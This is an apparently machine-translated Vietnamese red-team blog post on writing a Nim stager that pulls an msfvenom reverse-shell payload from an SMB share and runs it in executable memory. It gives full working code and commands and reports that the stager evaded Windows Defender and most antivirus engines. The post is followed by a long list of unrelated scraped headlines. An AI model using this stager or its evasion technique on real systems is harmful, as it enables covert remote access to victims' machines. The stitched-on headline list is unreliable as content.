Phát triển trình tạo SMB trong Nim

Nov 24 2022
Xin chào các bạn Đội Đỏ. Gần đây tôi đã bắt đầu liên hệ với Nim để viết mã gây khó chịu.

Xin chào các bạn Đội Đỏ. Gần đây tôi đã bắt đầu liên hệ với Nim để viết mã gây khó chịu. Thành thật mà nói, tôi thấy nó khó và lạ, nhưng nó HIỆU QUẢ!

Hôm nay chúng tôi đang phát triển trình tạo SMB đơn giản, bỏ qua Bộ bảo vệ Windows tại thời điểm thử nghiệm.

Nếu bạn thích xem video hơn là đọc, bạn có thể xem toàn bộ video tại đây:https://youtu.be/qq-S2syksL0

Ngoài ra, nếu bạn quan tâm đến việc tham gia Open Discord để chia sẻ kiến ​​thức và kinh nghiệm về an ninh mạng, hãy cảm thấy hoan nghênh:https://discord.gg/dWCe5ZMvtQ

Đi nào

Lý thuyết khá đơn giản, ý tưởng là để tránh ghi shellcode vào tệp, bỏ qua khả năng phát hiện dựa trên chữ ký, đồng thời hỗ trợ cho chẩn đoán. Ban đầu, tôi đã thử tải xuống shellcode bằng HTTP, nhưng tôi gặp phải nhiều sự cố và không thể tự giải quyết được. Sau đó, phương pháp luận hơi thay đổi. Thay vì tải xuống từ HTTP, tải trọng sẽ được lưu trữ trên phần chia sẻ SMB và sẽ được đọc trực tiếp từ đó.

Tôi đã sử dụng msfvenom tải trọng không giai đoạn

msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f raw -o code.bin


impacket-smbserver smb . -ts -debug -smb2support


import winim/lean

var filename = "\\\\192.168.153.128\\smb\\code.bin"

var file: File = open(filename, fmRead)

var fileSize = file.getFileSize() 
var shellcode = newSeq[byte](fileSize)
discard file.readBytes(shellcode, 0, fileSize)
file.close

echo shellcode

echo fileSize

echo sizeof(shellcode)

type
    buf* = LPVOID



var rez = VirtualAlloc(nil, fileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
copyMem(rez, shellcode[0].addr, fileSize)
let f = cast[proc(){.nimcall.}](rez)
f()

Trước tiên, chúng ta phải nhập thư viện nhân Windows, cho phép chúng ta gọi các API của Windows:

import winim/lean


var filename = "\\\\192.168.153.128\\smb\\code.bin"

var file: File = open(filename, fmRead)

var fileSize = file.getFileSize() 
var shellcode = newSeq[byte](fileSize)
discard file.readBytes(shellcode, 0, fileSize)
file.close


type
    buf* = LPVOID

var rez = VirtualAlloc(nil, fileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
copyMem(rez, shellcode[0].addr, fileSize)
let f = cast[proc(){.nimcall.}](rez)
f()

Thời gian thử nghiệm!

Tôi đã thực hiện 2 bài kiểm tra. Đầu tiên là chống lại Windows 10 Client với Defender UP and RUNNING. Thứ hai là chống giao diện antiscan.me.

Nim Stager so với Bộ bảo vệ Windows

Thử nghiệm 1 bắt đầu bằng cách thả trình khởi tạo vào hệ thống tệp. Không có gì được kích hoạt cho đến nay, có nghĩa là chúng tôi đã bỏ qua thành công phát hiện dựa trên chữ ký. Bây giờ hãy chạy và quan sát:

Stager hóa ra vẫn hoạt động tốt, và điều kỳ lạ ở đây là Defender đã được kích hoạt, nhưng điều này không giết được shell:

Tôi đã chạy shell này trong một vài phút và nó có đầy đủ chức năng. Cá nhân tôi không biết tại sao hậu vệ không giết nó, nếu bạn biết câu trả lời tôi sẽ đánh giá cao việc chia sẻ.

Nim Stager đấu với Antiscanme

Đừng hiểu sai ý tôi, antiscanme rất tuyệt nhưng khi thử nghiệm các trình phân tích, chúng không thực sự có cách trình bày kết quả hợp lệ. Các kết quả mà bạn thấy hoàn toàn dựa trên phát hiện dựa trên chữ ký, vì chúng không có khả năng mạng tải xuống mã shell thực tế. Tôi hy vọng sẽ có nhiều nhà cung cấp AV nắm bắt được điều đó khi thử nghiệm thực tế, nhưng đó là một “bước đầu tiên” tốt đẹp để thực hiện.

Sau khi tải lên stager, chỉ có 4/26 nhà cung cấp có thể bắt được nó.

Tôi tin rằng trình kích hoạt đó dựa trên việc các nhà cung cấp đọc các lệnh gọi API của Windows, do đó coi đó là một phần mềm độc hại. Tất nhiên, để kiểm tra xem chính xác điều gì đã xảy ra, tôi cần phải thực hiện rất nhiều thử nghiệm. Đó là lý thuyết của tôi cho thời điểm này.

Phần kết luận

Chơi với Nim rất thú vị và kết quả chúng tôi đạt được chỉ bằng cách dàn dựng mọi thứ thật tuyệt vời. Tất nhiên, chúng tôi có thể thực hiện nhiều kỹ thuật bỏ qua AV tiên tiến hơn, nhưng chúng tôi sẽ thực hiện điều đó trong tương lai. Hy vọng bạn thấy nội dung đó hữu ích và học được điều gì đó mới.

Cấu trúc dữ liệu trong JavaScript
Cấu trúc dữ liệu trong JavaScript
Dù sao thì một danh sách được liên kết là gì? [Phần 1]
Dù sao thì một danh sách được liên kết là gì? [Phần 1]
Vì vậy, hãy cho tôi biết về danh sách được liên kết
Vì vậy, hãy cho tôi biết về danh sách được liên kết
Khi tất cả những thứ khác không thành công, hãy sáng tạo
Khi tất cả những thứ khác không thành công, hãy sáng tạo
Phi thuyền của tôi ở nơi tận cùng thế giới
Phi thuyền của tôi ở nơi tận cùng thế giới
Bí đỏ và cải xoăn lasagne
Bí đỏ và cải xoăn lasagne
Không sợ thất bại, Walker Buehler bình tĩnh lập lại thành công ở ván 6 NLCS
Không sợ thất bại, Walker Buehler bình tĩnh lập lại thành công ở ván 6 NLCS
Vâng với Kell: Bạn ơi, hãy làm sạch ruột của bạn!
Vâng với Kell: Bạn ơi, hãy làm sạch ruột của bạn!
Hàng xóm của tôi
Hàng xóm của tôi
Sáng bóng
Sáng bóng
Sáng tạo như một chiếc la bàn
Sáng tạo như một chiếc la bàn
Ảnh hưởng của sợ hãi và đau buồn đối với sự sáng tạo
Ảnh hưởng của sợ hãi và đau buồn đối với sự sáng tạo
Ảnh hưởng của Cô đơn đối với Sáng tạo
Ảnh hưởng của Cô đơn đối với Sáng tạo
Nhưng nếu tôi không có nơi nào để trở về?
Nhưng nếu tôi không có nơi nào để trở về?
Nỗi đau không thể nhìn thấy
Nỗi đau không thể nhìn thấy
Cuối cùng tôi cũng bỏ được thuốc lá
Cuối cùng tôi cũng bỏ được thuốc lá
Tôi không còn cảm thấy tội lỗi vì không bị khóa-sản xuất
Tôi không còn cảm thấy tội lỗi vì không bị khóa-sản xuất
Không, đó không phải là cách bạn nói
Không, đó không phải là cách bạn nói
Nước Mỹ luôn là một vùng đất tàn bạo, cô đơn
Nước Mỹ luôn là một vùng đất tàn bạo, cô đơn
Đánh giá ngắn gọn về hai cảnh trong 'Borat 2'
Đánh giá ngắn gọn về hai cảnh trong 'Borat 2'
Con bạn chuyển giới cần một bác sĩ trị liệu - Và bạn cũng vậy
Con bạn chuyển giới cần một bác sĩ trị liệu - Và bạn cũng vậy
Bài học cuộc sống lịch sự của con trai chuyển giới của tôi
Bài học cuộc sống lịch sự của con trai chuyển giới của tôi
Tôi từ chối để lo lắng có tất cả sức mạnh
Tôi từ chối để lo lắng có tất cả sức mạnh
Khẩu trang Gây dị ứng, Thời trang và Những nỗi sợ hãi COVID-19
Khẩu trang Gây dị ứng, Thời trang và Những nỗi sợ hãi COVID-19
Mick Jagger cho biết 'Yêu cầu về quyền lực của quỷ Satan' của The Rolling Stones được lấy cảm hứng từ axit, không phải The Beatles
Rolling Stones: Keith Richards nổi giận bởi 1 nhóm người hâm mộ âm nhạc chỉ trích ban nhạc
Paul McCartney đã chia sẻ điều khiến anh ấy ấn tượng nhất về John Lennon khi họ gặp nhau lần đầu
John Lennon đã chia sẻ lý do tại sao 'The Tonight Show' là chương trình 'đáng xấu hổ nhất' mà anh ấy từng tham gia
Lời khuyên của Jimmy Page dành cho các nhạc sĩ trẻ là trực tiếp từ Cẩm nang diễn giả truyền cảm hứng
Tại sao Paul McCartney được 'bảo vệ' về việc nói sự thật về The Beatles
Paul McCartney: Sự đau khổ đã khiến 1 bài hát trong 'White Album' của The Beatles trở nên hay
Petula Clark cho biết 'Downtown' đã tiết lộ một bài hát tuyệt vọng
Dolly Parton đã giúp đỡ bà nội 'không hợp lệ' của cô ấy khi không có đứa cháu nào khác muốn—bà ấy cũng chơi khăm bà ấy
Prince đã làm việc trên một bài hát của Stevie Nicks trong một giờ và kiếm được một nửa số tiền bản quyền 
'Vụ án kỳ lạ của Natalia Grace': Nataila, Kristine và Michael Barnett ngày nay ở đâu?
George Harrison buồn bã Lời bài hát 'Hurdy Gurdy Man' của Donovan không được sử dụng
Paul McCartney nói "Khi tôi 64 tuổi" của The Beatles là một trò đùa
Paul McCartney đã rất căng thẳng về buổi biểu diễn duy nhất bị hủy của The Beatles đến nỗi anh ấy đã bỏ cuộc
Gene Simmons cho biết truyện tranh KISS có khả năng “tái tạo loài người
Bài hát của The Beatles Peter Asher được gọi là 'Bài hát hay nhất tôi từng nghe'
Làm thế nào Melissa Gilbert đã cứu một con chim bằng cách bẫy nó dưới áo ngủ của cô ấy
Bài hát đầu tiên của The Beatles là một trong những 'Màn trình diễn thú vị nhất' của ban nhạc, theo Fab Four Insider
Winona Ryder từng chia sẻ rằng tất cả các nhân vật của cô ấy đều được viết là 'Cô gái xấu xí' trước đó trong sự nghiệp của cô ấy
Stevie Nicks 'Bám chặt' vào 1 bài hát của Joni Mitchell khi cô ấy cảm thấy sự nghiệp âm nhạc của mình đang thất bại
'Cậu bé gặp gỡ thế giới': Tại sao ông Turner biến mất khỏi sê-ri?
John Ritter đã chết như thế nào: Nhìn lại cái chết của nam diễn viên 'Three's Company'
Jana Duggar: Tất cả những gì cô ấy nói về tình yêu và khoảng thời gian 5 năm để tìm 'một nửa' của cô ấy
'Đừng ngủ trong tàu điện ngầm' Petula Clark bối rối
Dolly Parton tìm thấy Chúa trong một nhà thờ bỏ hoang
Paul McCartney đã phản ứng như thế nào với tiêu đề 'Lucy in the Sky with Diamonds' của The Beatles
Ringo Starr từ chối chơi với bản nhạc nhấp chuột và nó khiến anh ấy trở thành một tay trống giỏi hơn
Người quản lý Led Zeppelin Peter Grant đã thấy một ban nhạc giả giành được giải Grammy trước Zep
Nhìn lại vai trò của Buddy Ebsen trong 'The Andy Griffith Show'
Brad Pitt và Harrison Ford phải tạo nên 'The Devil's Own' ngay lập tức khi 'Kịch bản bị loại bỏ'
John Lennon đã nói 1 dòng trong 'Revolution' của The Beatles đã bình luận về cảnh sát
Taylor Sheridan vừa thêm 1 ngôi sao 'Yellowstone' yêu thích của anh ấy vào dàn diễn viên của 'Lawmen: Bass Reeves'
Donovan đã so sánh 1 trong số các bài hát của anh ấy với 'Lucy in the Sky with Diamonds' của The Beatles
Billy Crystal và Robin Williams quảng cáo toàn bộ Cameo 'Những người bạn' của họ
David Bowie gần như đã viết một vở nhạc kịch bao gồm các bài hát giả của Bob Dylan
Ban đầu 'Sympathy for the Devil' của The Rolling Stones giống như nhạc Brazil
Nicole Kidman yêu thích 1 tính năng hấp dẫn mà Michael Keaton và Val Kilmer đã chia sẻ với tư cách là Người Dơi
Christopher Nolan từng hối hận khi đọc 'Kịch bản tiểu thuyết Pulp' của Quentin Tarantino
Bài hát của Paul Simon đã nhại lại Bob Dylan một cách hoàn hảo 
Sự nghiệp diễn xuất của Bradley Cooper đang trên đà phát triển khi anh ấy hợp tác với Julia Roberts trong dự án này
Sam Heughan biết chính xác những gì anh ấy sẽ lấy từ bộ 'Outlander' - 'Tôi cảm thấy như mình là Jamie khi tôi mặc chúng'
Quentin Tarantino từng chia sẻ về nhân vật thú vị nhất mà anh ấy từng viết trong 'Pulp Fiction'
'My Way' của Frank Sinatra không lớn bằng 'Old MacDonald' của anh ấy
Paul McCartney tưởng tượng mẹ anh ấy sẽ phản ứng thế nào trước thành công của anh ấy
Paul McCartney đã nói một 'Sgt. Bài hát của Pepper không phải về Heroin
Paul McCartney nói rằng anh ấy 'may mắn' khi chưa bao giờ sử dụng heroin 
MIA từng tấn công 'Give Peace a Chance' của John Lennon
John Lennon cho biết bài hát của B-52 này nghe giống như âm nhạc của Yoko
Nhìn lại những đám cưới đáng nhớ nhất của Nhà Trắng
Hạn hán, biến đổi khí hậu đe dọa tương lai của thủy điện Hoa Kỳ
Nấu ăn cảm ứng tốt hơn gas hay điện?
The Secrets of Airline Travel Quiz
Làm thế nào để thoát khỏi ruồi cống rãnh
Các nhà khoa học cuối cùng đã lấp đầy khoảng trống 8 phần trăm trong bộ gen người
Thuốc độc là gì và Twitter của sẽ giữ Elon Musk ở lại vịnh?
8 công dụng tuyệt vời của Baking Soda và Giấm
Tại sao Sriracha là nước sốt yêu thích của mọi người
Cụm từ "On the Lam" đến từ đâu?
Martha Mitchell: Người phụ nữ đã biết quá nhiều về Watergate
Nhóm người Samaritans tí hon vẫn thực hành tôn giáo cổ xưa của họ
Venice Biennale là 'Thế vận hội của Nghệ thuật'
Quyên góp tóc của bạn để giúp giữ nước sạch của chúng tôi
Hügelkultur: Tạo loại đất hoàn hảo cho khu vườn của bạn
1.500 đô la hôm nay Mua thẻ Yellowstone Pass với giá 2172
Ketanji Brown Jackson được xác nhận là Thẩm phán Tòa án Tối cao
Reign of Terror: Câu chuyện bị lãng quên về những vụ giết người của bộ tộc Osage
Ngọn núi cao nhất trong hệ mặt trời cao hơn nhiều so với Everest
Không Ai Có Thể Sống Nếu Không Có Mesentery, Nhưng Nó Làm Gì?
Hagfish: Máy làm chất nhờn giống lươn này là cơn ác mộng của động vật ăn thịt
Diệt chủng là gì, và Nga có phạm tội ở Ukraine không?
Nhòe là gì, và nó có thể làm sạch một không gian năng lượng tiêu cực không?
Người tị nạn Ukraine có thể không bao giờ trở về nhà, kể cả sau khi chiến tranh kết thúc
Cách khôi phục cài đặt gốc cho iPhone của bạn
Bướm đêm Atlas là một con Bướm đêm, cùng với 5 sự thật khác
Bạn có nên sử dụng Facebook hoặc Google để đăng nhập vào các trang web khác không?
Sự khác biệt giữa men khô tức thì và men hoạt động là gì?
Elon Musk Sở hữu Twitter. Cái gì có thể đi sai?
Pontius Pilate là ai, trước và sau khi Chúa Giêsu bị đóng đinh?
Bạn Có Ăn Casu Marzu, Phô Mai Bất Hợp Pháp Có Giòi Không?
Loại Bưởi Ngọt Ngào Nhất - Trắng, Đỏ hay Hồng?
Các khách sạn côn trùng Trải tấm thảm chào đón cho tất cả các loại bọ
Chỉ 50 người sống trên đảo Pitcairn, một trong những nơi đáng nhớ nhất trên trái đất
W Boson mới đo có thể phá vỡ mô hình chuẩn không?
Tại sao các công ty lớn như Tesla và Amazon lại chia tách cổ phiếu
Bạn có cần phải có thái độ tích cực để đánh bại ung thư không?
Tại sao Hoa Kỳ không có Hệ thống Khai thuế 'Miễn thuế'?
5 trích dẫn hùng hồn và lâu dài từ Maya Angelou
Bọ ngựa phong lan trông như hoa, 'đốt' như ong
Thời gian có thể không tồn tại, nói một số nhà vật lý và triết học
Cuộc tẩu thoát tuyệt vời! 5 động vật hoang dã phóng sinh và chạy trên đường chạy
Where in the World Are You? Take our GeoGuesser Quiz
Budgies là siêu xã hội và trở thành thú cưng tuyệt vời
Sự khác biệt giữa Dân chủ và Cộng hòa là gì?
Câu chuyện bi thảm đầy cảm hứng của Sophie Scholl, sinh viên thách thức Hitler
Pripyat: Thị trấn ma Ukraine trong Bóng tối của Chernobyl
Nhà máy điện ảo có thể giúp ổn định lưới năng lượng của Hoa Kỳ không?
David Harbor trêu chọc Frankenstein của anh ấy cho các biệt kích sinh vật của DC
Meta bây giờ sẽ có thể bán tai nghe VR giá rẻ mới của mình tại Trung Quốc
Darren Aronofsky sẽ chứng tỏ tài năng của mình khi đạo diễn bộ phim tiểu sử về Elon Musk cho A24
Valve cho biết Steam Deck 2 vẫn còn 'hai hoặc ba năm'
Sau khi ISS nghỉ hưu, các phi hành gia châu Âu có thể nhảy lên Trạm vũ trụ thương mại của Airbus
Sử dụng lốp phù hợp, cảm giác lái của Toyota Prius gần như thú vị như một chiếc Volkswagen GTI
Vậy, SAG-AFTRA thực sự đã thu được cái quái gì từ tất cả những điều đáng chú ý đó?
Russell T. Davies của Doctor Who nghĩ rằng Daleks cần một 'tạm dừng tốt'
Big Ten tuyên bố thiết quân luật, phần còn lại của bóng đá đại học tự hỏi liệu họ có thể làm được điều đó không
10 robot buồn nhất từng được chế tạo
Sherrone Moore hiện là tất cả người hâm mộ Michigan
Marvels đặt ra câu hỏi: Marvel sẽ trêu chọc chúng ta bao nhiêu lần bằng [DỮ LIỆU BỊ TÁC ĐỘNG]?
Crunchyroll sẽ ngừng ứng dụng Manga của riêng mình vào tháng tới
Final Fantasy VII Rebirth có thể tạo nên một Zack Twist hoang dã
Rất lâu trước The Curse, Albert Brooks đã xiên “truyền hình thực tế” với Real Life
Max và Netflix được đồn đại đang hợp tác với gói phát trực tuyến trị giá 10 đô la
Cảnh hậu tín dụng của Marvel mang lại những thay đổi lớn cho trò chơi cho MCU
Gợi ý (và câu trả lời) về kết nối NYT hôm nay cho Thứ Bảy, ngày 11 tháng 11 năm 2023
Bentley sẽ trang bị cho du thuyền của bạn ngay bây giờ, điều đó có nghĩa là Orcas có cơ hội làm điều thú vị nhất có thể
Báo cáo cho biết điện thoại và iPad của Thị trưởng NYC bị FBI thu giữ
Kẻ hủy diệt đã trở lại, lần này dưới dạng anime
Cách xác định vị trí và làm sạch bộ lọc máy rửa chén của bạn
The Witcher đang quay trở lại hoạt hình và mang theo giọng nói cũ mới
Theo các nhà thầu, cách tiết kiệm thời gian và tiền bạc khi cập nhật phòng tắm của bạn
The Marvels đang hướng tới một trong những bộ phim có doanh thu phòng vé tệ nhất mọi thời đại của MCU
Studio cuối cùng của chúng tôi nói lời tạm biệt với một giám đốc điều hành khác
Cuối cùng, một bản mod Halo Infinite dành cho những người không thể nhắm mục tiêu
Bất chấp thành công của Deion Sanders, những huấn luyện viên xứng đáng của HBCU vẫn không có cơ hội thăng tiến
Blue Beetle sẽ tăng giá tối đa vào tuần tới
Bậc thầy của vũ trụ: Cuộc cách mạng trêu chọc Hordak của Keith David
Sự hủy bỏ của Coyote so với Acme đã làm tan nát trái tim của phi hành đoàn
Đi trên tàu chở rác của New York được chế tạo để hút rác khỏi đường ray
Ngày tận thế ẩn nấp trong clip mới của Netflix Để lại thế giới phía sau
Gợi ý (và câu trả lời) về kết nối NYT hôm nay cho Chủ nhật, ngày 12 tháng 11 năm 2023
Fran Drescher và The Rock rõ ràng đều đang nhận được yêu cầu tranh cử tổng thống
Hội đồng quản trị của SAG-AFTRA phê duyệt thỏa thuận dự kiến ​​với AMPTP
Cảnh sát Úc bị kết án vì rút súng vì đe dọa Top Gun: Maverick spoilers
Nhân viên SpaceX bị gãy xương, chấn thương ở đầu do coi thường an toàn của công ty, báo cáo yêu cầu bồi thường
Bật lửa Ya: Ohio trở thành tiểu bang thứ 24 hợp pháp hóa cỏ dại giải trí
Kẻ hủy diệt sẽ trở lại dưới dạng loạt phim hoạt hình Netflix
Ngừng cho bé chơi với thức ăn cho chó
Làm thế nào để tránh các khoản phí bổ sung khi đi du lịch một mình
Đánh giá Samsung Galaxy S23 FE: Niềm vui đơn giản của một chiếc điện thoại đơn giản
Sam Altman đã thử chiếc cổ rùa của Steve Jobs trong tuần này
James Gunn đang giữ Superman: Legacy trong vị trí phát hành ban đầu
Cách dịch trang web trong bất kỳ trình duyệt nào
Nerf, Cabbage Patch Kids được giới thiệu vào Đại sảnh Danh vọng Đồ chơi Quốc gia
Vâng, có lẽ đó là điều dành cho Loki
Molly Ringwald kỷ niệm 22 năm ngày cưới với chồng Panio Gianopoulos: 'Quyết định tốt nhất tôi từng đưa ra'
Cô gái mất tích, 17 tuổi, có khả năng chết cóng sau khi lái xe xuống mương ở vùng nông thôn Wisconsin: Các quan chức
Chồng của Lisa Vanderpump là ai? Tất cả về Ken Todd
Chelsea Houska của 'Bà mẹ tuổi teen' chia sẻ phản ứng đẫm nước mắt đối với việc gia hạn chương trình HGTV mùa 2: 'Có ý nghĩa rất nhiều'
Melissa Gorga không chắc liệu cô ấy có giải quyết được mối thù với Teresa Giudice hay không: 'Bạn có thể để thứ gì đó độc hại đến mức nào?'
Vận động viên Olympic Jasmine Camacho-Quinn ăn mừng khi anh trai Robert Quinn của cô ấy được tham dự Super Bowl
Margaret Josephs bảo vệ sự lựa chọn 'tàn khốc' của Melissa và Joe Gorga để bỏ qua đám cưới của Teresa Giudice
Người mua hàng đồng ý rằng Máy quét sàn màu đen + Decker này 'Nhanh hơn nhiều' so với chổi truyền thống và nó đang được giảm giá
Máy sấy tóc nhẹ 'Rất yên tĩnh' mà người mua hàng nói rằng mang lại cho họ một 'hoàn thiện như ở tiệm' chỉ $ 20 tại Amazon
Chloe Cherry của 'Euphoria' phải đối mặt với cáo buộc trộm cắp vì bị cáo buộc ăn cắp chiếc áo cánh trị giá 28 đô la
Lizzo đã cấp nhãn hiệu cho '100% THAT Bitch' khi đảo ngược sau khi đơn đăng ký bị từ chối
Danielle Moné Truitt của 'Law & Order' nghĩ rằng người hâm mộ đã bị 'lừa; Bởi Stabler và Benson Kiss Tease
Gwyneth Paltrow tiết lộ chiếc váy dạ hội mà cô đã giữ trong mối quan hệ với Brad Pitt 
Lịch sử hẹn hò của Drake: Từ Rihanna đến Jennifer Lopez
Tom Girardi tham dự phiên điều trần để xác định thẩm quyền hầu tòa về tội gian lận
TJ Watt muốn thấy Tom Brady và anh trai JJ được giới thiệu vào Đại sảnh Danh vọng NFL cùng nhau
Có hơn 2.500 phong cách thời tiết lạnh ẩn trong phần giảm giá bí mật này tại Nordstrom Rack - Bắt đầu từ $6
Bob Barker, Người dẫn chương trình 'The Price Is Right' lâu năm, qua đời ở tuổi 99: 'MC vĩ đại nhất thế giới'
Ca sĩ 'Flashdance' Irene Cara chết vì tăng huyết áp, cholesterol cao: Báo cáo
Muni Long nói rằng cô ấy vẫn chưa 'xử lý' để kiếm được 3 đề cử Grammy: 'Mọi thứ đang diễn ra quá nhanh'
Huyết thanh Retinol Under-the-Radar này đã mang lại cho tôi 'làn da kỳ nghỉ' rạng rỡ
Heather Rae và Tarek El Moussa chào đón bé trai của họ: 'Trái tim của chúng tôi rất hạnh phúc'
Người Bengal chạy lại Joe Mixon bị truy nã về lệnh bắt giữ được ban hành vì bị cáo buộc chĩa súng vào phụ nữ
Gia đình của Yara Shahidi: Tất cả về cha mẹ và anh chị em của nữ diễn viên
Dwayne Johnson cho biết mẹ anh vẫn 'ổn' sau tai nạn xe hơi vào đêm khuya, sẽ 'tiếp tục được đánh giá'
Người phụ nữ được tìm thấy còn sống và 'thở hổn hển' trong túi đựng xác tại Nhà tang lễ Iowa
Danh sách bất động sản của Kirstie Alley Ngôi nhà trị giá 6 triệu đô la ở Florida của Ngôi sao quá cố mà cô đã mua từ Lisa Marie Presley
Clare Crawley mặc chiếc váy cưới thay thế 'trong mơ' sau khi chiếc váy đầu tiên của cô ấy bị đánh cắp - Hãy xem diện mạo của cô ấy!
Giáo sư Đại học Purdue bị bắt vì bị cáo buộc buôn bán ma túy và cầu hôn phụ nữ để được ân huệ tình dục
Matthew McConaughey tiết lộ một thầy bói đã bảo anh ấy đóng vai chính trong 'Làm thế nào để mất một chàng trai trong 10 ngày'
Jimmy Buffett, ca sĩ 'Margaritaville', qua đời ở tuổi 76
Whoopi Goldberg cho thấy Kit Harington 'Trò chơi vương quyền' -Nhà vệ sinh lấy cảm hứng từ cô ấy: 'Một chiếc ngai sắt thực sự'
Người phụ nữ đã chết 37 năm trước sau khi được tìm thấy trong tình trạng bất tỉnh trên đường cao tốc Ga. Được xác định là bà mẹ mất tích của 4 đứa trẻ
Vợ của Vince Vaughn là ai? Tất cả về Kyla Weber
Trượt băng nghệ thuật Hoa Kỳ 'Thất vọng' vì thiếu quyết định cuối cùng trong sự kiện đồng đội, kêu gọi phán quyết công bằng
Các cơ quan được cho là thuộc về các rapper mất tích kể từ khi buổi biểu diễn bị hủy được tìm thấy: 'Họ không xứng đáng với điều này'
Trevor Noah nói 'Break My Soul' của Beyoncé là 'Nhạc nền của cuộc đời tôi' khi anh ấy rời khỏi 'Chương trình hàng ngày'
Susan Lucci rưng rưng nhớ về người chồng quá cố khi cô thừa nhận mình 'chưa sẵn sàng' để bắt đầu hẹn hò
Vợ của Jason Kennedy là ai? Tất cả về Lauren Scruggs Kennedy
Paul McCartney về việc 'Lãng mạn' với Vợ Nancy Shevell: 'Tôi hoàn toàn lạm dụng Ngày lễ tình nhân'
Vợ của Michael C. Hall là ai? Tất cả về Morgan Macgregor
Người mua hàng trên Amazon cho biết họ ngủ 'như một đứa trẻ được nuông chiều' nhờ những chiếc vỏ gối bằng lụa này chỉ có giá 10 đô la
Dòng thời gian về mối quan hệ của Suzanne Somers và Alan Hamel
Marvel đang thực sự xuất bản một cuốn hồi ký hư cấu của Scott Lang từ 'Ant-Man and the Wasp: Quantumania'
Tất cả về mối quan hệ của Zoë Kravitz với cha mẹ Lenny Kravitz và Lisa Bonet
Charly Reynolds tiết lộ ca phẫu thuật dây thanh gần đây: 'Tôi gặp khó khăn khi hát'
Eric và Jessie James Decker luôn 'dụ dỗ nhau' — và bọn trẻ không thích điều đó
Giải cứu động vật cảnh báo 'Không bao giờ nhuộm một con chim' sau khi tìm thấy chim bồ câu màu hồng 'đấu tranh' lang thang ở NYC
Tôi là sinh viên đại học 21 tuổi. Tôi có thể làm gì bây giờ sẽ thay đổi cuộc đời tôi mãi mãi?
Những tác động tiêu cực của việc trải qua tuổi dậy thì (sức khỏe tâm thần, v.v.) là gì?
Chuyển giới: Khó khăn nhất trong quá trình chuyển giới từ nam sang nữ của bạn là gì?
Điều quan trọng nhất mà một thiếu niên 14 tuổi cần ghi nhớ là gì?
Trẻ 14 tuổi có thể làm gì để cuộc sống của chúng tốt hơn / dễ dàng hơn?
Tôi 16 tuổi sẽ 17 vào tháng tới. Tôi làm cách nào để tìm gặp bác sĩ trị liệu nếu mẹ tôi nghĩ rằng tôi không cần đến bác sĩ?
Em năm nay 17 tuổi, em phải làm gì để có thêm kiến ​​thức?
Điều gì sẽ xảy ra nếu bạn chưa bao giờ bước qua tuổi dậy thì?
Làm cách nào để bắt đầu quá trình chuyển đổi từ nam sang nữ? Tôi đã luôn luôn là một cô gái bên trong. Tôi cần phải làm gì?
HRT có được khuyến nghị cho thanh thiếu niên chuyển giới không?
Tôi vừa tròn 17 tuổi, tôi phải làm gì bây giờ để đảm bảo cuộc sống tốt nhất cho bản thân?
Cách tốt nhất để chuyển từ nam sang nữ một cách tự nhiên là gì?
Điều hữu ích nhất tôi có thể làm khi tôi 14 tuổi là gì?
Những loại thuốc nào có thể thay đổi nam thành nữ mà không cần phẫu thuật?
Tại sao tôi chưa bao giờ nhìn thấy một người chuyển giới từ nữ sang nam?
Spironolactone có hại cho HRT không?
Tuổi dậy thì diễn ra theo từng giai đoạn? Nó có thể dừng lại và sau đó bắt đầu lại không?
Tôi đang chuyển đổi từ nữ sang nam. Tên mới của tôi phải là gì?
Tôi 17 tuổi và dự định tiếp tục theo học HRT khi tôi tốt nghiệp năm nay 18 tuổi. Cho đến lúc đó, tôi có thể làm gì để khiến mình cảm thấy mình là phụ nữ hơn?
Tôi 19 tuổi và là con một. Tôi chán nản và lo lắng về điều gì đó sẽ xảy ra với bố mẹ mình vì họ là tất cả những gì tôi có. Tôi không có bất kỳ người bạn nào và tôi cũng không thể kết bạn với đại dịch. Tôi sợ ở một mình, tôi có thể làm gì để tự giúp mình?
Làm cách nào để nhận HRT mà không nói rằng tôi muốn HRT?
Tôi là một đứa trẻ 14 tuổi, người rất dễ chán những sở thích của mình. Làm thế nào để tôi tìm thấy đam mê và tài năng của mình?
Phẫu thuật tạo hình đáy có đáng để chuyển từ nam thành nữ không?
Bắt đầu HRT ở tuổi 18 (chuyển giới) có phải là một ý kiến ​​hay không?
Là một đứa trẻ 13 tuổi, làm thế nào tôi có thể tiết kiệm và tích trữ tiền mà bố mẹ không biết?
Những thay đổi nào sẽ xảy ra nếu bạn tiếp tục HRT lúc 13 tuổi?
Hôm nay tôi 19 tuổi. Điều quan trọng nhất mà tôi nên học là gì?
Theo bạn, việc chuyển đổi giới tính nào khó hơn, từ nữ sang nam (FtM) hay nam thành nữ (MtF)?
Làm thế nào tôi có thể thay đổi cuộc sống của mình ở tuổi 17?
Trong quá trình chuyển đổi giới tính từ nam sang nữ, ngực phát triển có cảm giác như thế nào?
Tôi sẽ bước sang tuổi 16 vào ngày mai. Bạn có thể đưa ra lời khuyên cụ thể nào cho một cậu bé 16 tuổi?
Làm thế nào để tôi ngừng dậy thì mà không có thuốc chặn dậy thì?
Tôi vẫn chuyển giới (FTM) nếu tôi chỉ bắt đầu có dấu hiệu khi bước vào tuổi dậy thì?
Bạn có thể bắt đầu sử dụng hormone MTF HRT ở tuổi 13 không?
Tôi 23 tuổi. Tôi có thể làm gì bây giờ sẽ thay đổi cuộc đời tôi mãi mãi?
18 có phải là độ tuổi tốt để bắt đầu chuyển sang MTF?
Nếu tôi muốn tìm hiểu để bắt đầu điều trị chuyển đổi giới tính thì tôi nên đến khám ở bác sĩ nào?
Tôi 13 tuổi, chuyển giới (ftm) và đã đến gặp bác sĩ trị liệu được vài tháng. Làm sao tôi có thể nói với cô ấy rằng tôi là người chuyển giới và nhờ cô ấy đưa ra lời khuyên?
Một tháng nữa tôi bước sang tuổi 17 và tôi đã nghĩ rằng mình không thực sự cảm thấy khác biệt so với khi 11 tuổi, điều này có bình thường không? Liệu tôi có thực sự thay đổi khi tôi già đi?
Những kỹ năng sống cần thiết mà em có thể thành thạo trong 3 tháng hè này là gì? Tôi 17 tuổi.
Tôi 14 tuổi, bạn muốn cho tôi lời khuyên nào sẽ hữu ích cho phần còn lại của cuộc đời tôi?
Tôi 30 tuổi. Tôi có thể làm gì bây giờ sẽ thay đổi cuộc đời tôi mãi mãi?
